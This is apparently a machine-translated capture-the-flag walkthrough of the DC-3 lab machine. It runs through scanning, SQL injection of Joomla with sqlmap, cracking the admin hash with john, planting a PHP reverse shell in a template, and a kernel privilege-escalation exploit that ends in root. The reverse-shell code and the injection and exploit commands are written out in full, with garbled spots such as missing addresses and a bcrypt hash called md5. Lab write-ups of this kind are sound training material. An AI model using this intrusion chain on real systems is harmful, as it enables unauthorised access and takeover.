Detailed explanation of actual combat in DC-3 shooting range

Environmental installation

The old version of DC-3 was installed several times before, and nmap couldn't scan the machine. Later, I thought about it for a long time and couldn't find the problem. Then I went to the official website and downloaded it again

Official website address:,312/

Both KALI and DC-3 use NAT mode

DC-3 needs more modifications

Change the in IDE to IDE 0:0

Open KALI and DC-3 after completion


information gathering

1. First confirm the network segment between kali and DC-3

ip add 

Confirm that the network segment between kali and DC-3 is

2. You can use nmap or ARP scan to find DC-3 ip

Method 1:
	arp-scan -l
 Method 2:
    nmap -sP

Finally, it can be confirmed

kali :

DC-3 :

  1. Scan DC-3 for open services
nmap -v -A

Through scanning, it can be found that DC-3 has opened port 80 and uses Joomla! cms

4. Visit website

5. Scan sensitive directories

I use 7kbscan webpathbrute 1.6.2 the same is true with the imperial sword

Find the background login website.

Because it's a common cms, let's scan Joomla directly! Common vulnerabilities of cms

Vulnerability scanning

1. Install onlinetool (online cms identification | information disclosure | industrial control | system | Internet of things security | cms vulnerability scanning | nmap port scanning | subdomain name acquisition | online tool installation)


We can deploy kali installation tutorial here

git clone
cd onlinetools
pip3 install -r requirements.txt
nohup python3 &

2. Access after installation

3. Use cms vulnerability scanning inside

4. Test the effectiveness of payload


Verify that payload is valid

5. Since it is a SQL injection vulnerability, log in to the background with the background login website exploded by sqlmap and the previous directory

I use the version of sqlmap windows here

python -u "[fullordering]=*" --dbs

//*Indicates the injection position 
//Query all databases

Get the following five databases, since they are joomla! Then let's query joomladb database naturally

python -u "[fullordering]=*" -D "joomladb" --tables
//Check the table below joomladb database

There are 890 in total. There is one#_ users seems to have relevant background information

Next query#_ Column names in the users table

python -u "[fullordering]=*" -D "joomladb" -T "#__users" --columns
//Inquiry#_ Column names in the users table

All the way y or return

Confirm that the column name account password is generally "username,password"

Obtain the account and password in the table

python -u "[fullordering]=*" -D "joomladb" -T "#__users" -C "username,password" --dump
//Read the contents of the specified field

Get account password

| username | password |
| admin | $2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |

6. The password is md5 encryption and can be decrypted by john in kali

create a file
touch admin.txt   #create a file
vi admin.txt      #edit
john admin.txt    #Crack

  Because I have cracked and used it before, this is displayed
  	Using default input encoding: UTF-8
	Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
	No password hashes left to crack (see FAQ)
  This is and cracked meaning
john --show admin.txt  #View admin Txt previously cracked results

The password obtained is: snoopy
  1. Login background

Rebound shell

Through various background queries, it is found that the templates in extensions - > templates can execute PHP scripts

You can find it anywhere. The path is written in it

When the system is not disabled proc_popen We can use it when we need it proc_popen Easily rebound such a shell of
$sock = fsockopen("", "5555");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock


$process = proc_open('/bin/sh', $descriptorspec, $pipes);


Save access after

shell that uses nc to accept bounce in kali

nc -lvvp 5555

Browser access

It can be found that the shell is received in kali

python -c "import pty;pty.spawn('/bin/bash')"
//Interactive pages using python

Insufficient permissions found

Right raising

SUID can't do anything, so we consider raising the right to system vulnerabilities

cat /etc/*release		#View release information

cat /proc/version  #View all information about the kernel version

It can be judged that the kernel of Ubuntu 16.04 LTS is Linux 4.4.0-21

Check the exp in kali's local vulnerability library

searchsploit Ubuntu 16.04

Several corresponding versions have tried and found 39772 Txt yes

View exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

Wrote the exp address

Download locally

kali can't seem to download it. I download it locally and pull it into kali

Open apache

systemctl start apache2.service

Mobile 39772 Zip to the specified apache directory

mv /var/www/html

Browser access kali IP:

Copy download link

Go back to the previous DC-3 shell and download the exp just uploaded


Decompress exp

unzip			#Unzip 39772 zip
cd 39772				#Enter 39772
tar -xvf exploit.tar	#Unzip exploit tar

Enter ebpf_mapfd_doubleput_exploit run exp

cd ebpf_mapfd_doubleput_exploit

Run cat / usr / share / exploitdb / exploits / Linux / local / 39772 in kali Txt file

Run compile SH, double put


Just wait a minute or two


There is a flag in the root directory. Get the flag

cd /root
cat the-flag.txt


  • Nmap, ARP scan host scan
  • cms vulnerability scanning
  • sql injection vulnerability sqlmap with payload
  • Sensitive directory blasting
  • Preparation of php shell
  • System vulnerability rights

Keywords: Linux security dc

Added by thebluebus on Wed, 26 Jan 2022 17:31:36 +0200